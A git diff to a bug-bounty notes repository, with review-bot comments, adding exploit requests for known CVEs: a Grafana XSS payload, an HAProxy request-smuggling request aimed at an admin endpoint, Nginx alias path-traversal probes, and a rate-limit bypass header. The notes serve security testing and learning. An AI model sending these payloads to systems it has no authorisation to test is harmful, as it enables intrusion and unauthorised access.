diff --git a/Bypass/Bypass Rate Limit.md b/Bypass/Bypass 429.md similarity index 98% rename from Bypass/Bypass Rate Limit.md rename to Bypass/Bypass 429.md index 403963d..be6f9f6 100644 --- a/Bypass/Bypass Rate Limit.md +++ b/Bypass/Bypass 429.md @@ -1,4 +1,4 @@ -# Bypass Rate Limit +# 429 Rate limit Bypass 1. Try add some custom header ``` X-Forwarded-For : 127.0.0.1 diff --git a/README.md b/README.md index 0477a1c..1617141 100644 --- a/README.md +++ b/README.md @@ -25,8 +25,8 @@ These are my bug bounty notes that I have gathered from various sources, you can - [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md) - [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md) - [Bypass 304](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20304.md) +- [Bypass 429](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20429.md) - [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md) -- [Bypass File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20File%20Upload.md) - [Bypass Rate Limit](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Rate%20Limit.md) ## List CMS 
@@ -47,9 +47,12 @@ These are my bug bounty notes that I have gathered from various sources, you can - [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md) ## Technologies +- [Grafana](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Grafana.md) +- [HAProxy](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/HAProxy.md) - [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md) - [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md) - [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md) +- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md) ## Reconnaissance - [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md) diff --git a/Technologies/Grafana.md b/Technologies/Grafana.md index 7c33a11..ed6f20c 100644 --- a/Technologies/Grafana.md +++ b/Technologies/Grafana.md @@ -1,9 +1,13 @@ # Grafana -1. CVE-2020-13379 (Denial of Service) +1. CVE-2021-41174 (Reflected XSS) +``` +/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1 +``` +2. CVE-2020-13379 (Denial of Service) ``` /avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D ``` -2. CVE-2020-11110 (Stored XSS) +3. CVE-2020-11110 (Stored XSS) ``` POST /api/snapshots HTTP/1.1 Host: 
@@ -15,7 +19,7 @@ Connection: close {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0} ``` -3. CVE-2019-15043 (Grafana Unauthenticated API) +4. CVE-2019-15043 (Grafana Unauthenticated API) ``` POST /api/snapshots HTTP/1.1 Host: @@ -27,11 +31,11 @@ Content-Type: application/json {"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600} ``` -4. Default Credentials +5. Default Credentials ``` Try to login using admin as username and password ``` -5. Signup Enabled +6. Signup Enabled ``` /signup ``` \ No newline at end of file diff --git a/Technologies/HAProxy.md b/Technologies/HAProxy.md new file mode 100644 index 0000000..52ceeb1 --- /dev/null +++ b/Technologies/HAProxy.md 
@@ -0,0 +1,15 @@ +# HAProxy +1. CVE-2021-40346 (HTTP Request Smuggling) +``` +POST /index.html HTTP/1.1 +Host: abc.com +Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: +Content-Length: 60 + +GET /admin/add_user.py HTTP/1.1 +Host: abc.com +abc: xyz +``` + +Source: +- [JFrog](https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/) \ No newline at end of file diff --git a/Technologies/Nginx.md b/Technologies/Nginx.md new file mode 100644 index 0000000..ee3385b --- /dev/null +++ b/Technologies/Nginx.md @@ -0,0 +1,11 @@ +# Nginx + +1. Directory traversal +``` +https://example.com/folder1../folder1/folder2/static/main.css +https://example.com/folder1../%s/folder2/static/main.css +https://example.com/folder1/folder2../folder2/static/main.css +https://example.com/folder1/folder2../%s/static/main.css +https://example.com/folder1/folder2/static../static/main.css +https://example.com/folder1/folder2/static../%s/main.css +``` \ No newline at end of file
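Review bot: The rename of `Bypass/Bypass Rate Limit.md` to `Bypass/Bypass 429.md` leaves a dangling link in the first README hunk (`@@ -25,8 +25,8 @@`): the new `- [Bypass 429](…/Bypass%20429.md)` entry is added, but the old `- [Bypass Rate Limit](…/Bypass%20Rate%20Limit.md)` line is kept and now points at a file that no longer exists. Drop the old line (or turn it into the single renamed entry) so the index and the tree agree. The same hunk also removes the `Bypass File Upload` link without any matching change to that file elsewhere in the patch; the commit should say why, or the link should stay.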
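Review bot: Copy-paste error in the second README hunk (`@@ -47,9 +47,12 @@`): the added line `+- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md)` is labelled Moodle but links to `Technologies/Nginx.md`, producing a duplicate "Moodle" entry and no visible "Nginx" entry. It should read `- [Nginx](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Nginx.md)`.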
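Review bot: The new heading `# 429 Rate limit Bypass` in the renamed file breaks the naming convention used by the sibling notes (`Bypass 2FA`, `Bypass 403`, `Bypass 304`) and by the new README link text `Bypass 429`; a heading such as `# Bypass 429 (Rate Limit)` would keep the file, its title and the index consistent. The unchanged context line `1. Try add some custom header` also reads better as `1. Try adding a custom header`.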
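Review bot: The Grafana hunk inserts `1. CVE-2021-41174 (Reflected XSS)` and renumbers the remaining items, but, like the entries before it, it records only a request path and no affected or fixed version range and no reference, so a reader has no way to tell whether a given Grafana deployment is exposed or patched. Since the new `HAProxy.md` in this same patch sets the precedent of a `Source:` list, the Grafana entry should get one too, with the advisory that states the vulnerable and fixed versions. The pre-existing empty `Host: ` lines in the request templates are fine as placeholders but would be clearer as `Host: <target>`.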
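Review bot: `Technologies/HAProxy.md` shows the CVE-2021-40346 request with a very long `Content-Length0aaaa…:` header name followed by `Content-Length: 60`, but never explains what the reader is looking at (an over-long header name driving the parser into treating the second `Content-Length` as authoritative) or which HAProxy versions are affected and fixed. Add one sentence describing the mechanism and the affected/fixed versions from the linked JFrog write-up, so that the file also works as a checklist for operators deciding whether to patch. The file also ends with `\ No newline at end of file`; add the trailing newline.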
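Review bot: In `Technologies/Nginx.md` the heading `1. Directory traversal` is too vague for what the listed URLs actually probe: paths of the form `/folder1../folder1/…` are the check for a `location /folder1 { alias …; }` block whose location lacks a trailing slash, so the `..` is appended to the aliased directory instead of being normalised away. Name the misconfiguration (alias off-by-slash) so readers know which `nginx.conf` pattern to look for and fix, and state that `%s` in the URLs is a placeholder for a sibling directory name, since as written it looks like a literal to send. The file is also missing its trailing newline.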